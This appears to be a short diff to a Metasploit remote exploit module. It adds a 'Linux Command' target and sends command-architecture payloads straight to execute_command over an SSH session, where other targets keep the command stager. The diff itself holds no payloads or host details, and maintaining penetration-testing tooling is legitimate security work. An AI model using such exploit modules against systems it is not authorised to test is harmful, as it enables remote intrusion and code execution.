@@ -41,6 +41,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'CmdStagerFlavor'  => %w[bourne echo printf wget],
       'Targets'          =>
         [
+          [
+            'Linux Command',
+            {
+              'Arch'     => ARCH_CMD,
+              'Platform' => 'linux'
+            }
+          ],
           [
             'Linux x86',
             {
@@ -237,7 +244,11 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'unix'
       execute_command(payload.encoded)
     else
-      execute_cmdstager(linemax: 500)
+      if target['Arch'] == ARCH_CMD
+        execute_command(payload.encoded)
+      else
+        execute_cmdstager(linemax: 500)
+      end
     end
 
     @timeout ? ssh_socket.shutdown! : ssh_socket.close
